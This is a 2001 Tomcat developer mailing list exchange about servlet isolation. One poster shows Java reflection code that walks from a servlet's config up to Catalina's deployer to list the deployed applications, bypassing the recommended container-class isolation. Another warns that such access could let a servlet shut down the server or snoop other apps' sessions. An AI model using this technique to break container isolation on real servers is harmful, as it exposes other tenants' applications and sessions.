tomcat-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Fabien Le Floc'h <...@operamail.com>
Subject Re: security and a servlet using core catalina classes
Date Thu, 10 May 2001 02:44:50 GMT
Ok, this is possible to bypass the "security"!

Catalina conforms to the behavior in the Servlet 2.3 PFD2 Specification (Section 9.7.2) but
does not comply with its "recommended" behaviour.

Here is the code (not clean, sorry about that) for the doGet method of an regular servlet:

	response.setContentType("text/plain");
	PrintWriter writer = response.getWriter();

	Object theWrapper = (Object) this.getServletConfig();
	try {
	    Method method = theWrapper.getClass().getMethod("getParent", new Class[] {});

	    Object theContext = method.invoke(theWrapper, new Object[] {});
	    method = theContext.getClass().getMethod("getParent", new Class[] {});
	    Object theDeployer = method.invoke(theContext, new Object[] {});
	    method = theDeployer.getClass().getMethod("findDeployedApps", new Class[] {});
	    Object deployedApps = method.invoke(theDeployer, new Object[] {});
	    String[] apps = (String[]) deployedApps;
	    writer.println("detected apps:");
	    for (int i=0; i<apps.length;i++) {
		writer.println(apps[i]);
	    }
	} catch (Exception e) {
	    e.printStackTrace();
	    writer.println("An exception occured when invoking the method, "+e.getMessage());
	}
	writer.flush();
	writer.close();


My project is to build a servlet inspector servlet for Tomcat in order to have a Dynamo DCC
like feature.

Regards,

Fabien


"Craig R. McClanahan" <craigmcc@apache.org> writes:

> On 9 May 2001, Fabien Le Floc'h wrote:
> 
> > Thanks for your answer,
> > 
> > I decided to put my servlet in the catalina hierarchy (on my personal
> > computer). When it will be more advanced, I could even propose it as a
> > contribution to catalina.
> > 
> 
> Any hints on what it actually does?
> 
> > But I think would have been possible to bypass the "security" by just
> > using reflection to call the core methods.
> > 
> 
> Doing this would mean making it possible for an end user servlet to do
> nasty things like shut down the server, or snoop the sessions of some
> other web app.  Once you have access to the server's internals, there is
> basically no method you would not be able to call.
> 
> In addition, the current Catalina architecture conforms to a suggested
> behavior in the Servlet 2.3 PFD2 Specification (Section 9.7.2):
> 
>     "The classloader that a container uses to load a servlet in
>     a WAR must not allow the WAR to override J2SE or Java servlet
>     API classes.  It is futher recommended that the loader not
>     allow servlets in the WAR access to the web container's
>     implementation classes.
> 
> > Regards,
> > 
> > Fabien
> > 
> 
> Craig


Mime
View raw message